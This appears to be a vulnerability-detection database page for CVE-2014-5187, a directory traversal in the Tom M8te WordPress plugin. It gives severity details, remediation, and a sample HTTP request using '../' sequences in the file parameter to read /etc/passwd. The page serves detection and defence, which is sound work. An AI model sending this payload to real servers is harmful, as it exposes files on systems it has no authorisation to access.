🔙 목록으로 돌아가기

CVE-2014-5187: Tom M8te (tom-m8te) Plugin 1.5.3 - Directory Traversal

TitleTom M8te (tom-m8te) Plugin 1.5.3 - Directory Traversal
AuthorDhiyaneshDK
SeverityMedium
ImpactRemote attackers can read arbitrary files on the server, potentially leading to information disclosure or further exploitation.
RemediationUpdate to the latest version of the plugin or apply security patches to fix the vulnerability.
CVSS Score5
EPSS Score0.00991
CVE IDCVE-2014-5187
CWE IDCWE-22
Tags wpscan cve cve2014 wp-cross-rss wordpress wp-plugin lfi wp tom-m8te vuln

🔍 Vulnerability Description

Directory traversal vulnerability in the Tom M8te (tom-m8te) plugin 1.5.3 for WordPress allows remote attackers to read arbitrary files via the file parameter to tom-download-file.php.

🌐 HTTP Request

GET / HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Kubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36
Connection: close
Accept-Encoding: gzip
GET /wp-content/plugins/tom-m8te/tom-download-file.php?file=../../../../../../../etc/passwd HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:31.0) Gecko/20100101 Firefox/31.0
Connection: close
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2014/CVE-2014-5187.yaml

🦈 Packet Capture: ⬇️ Download cve-2014-5187.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A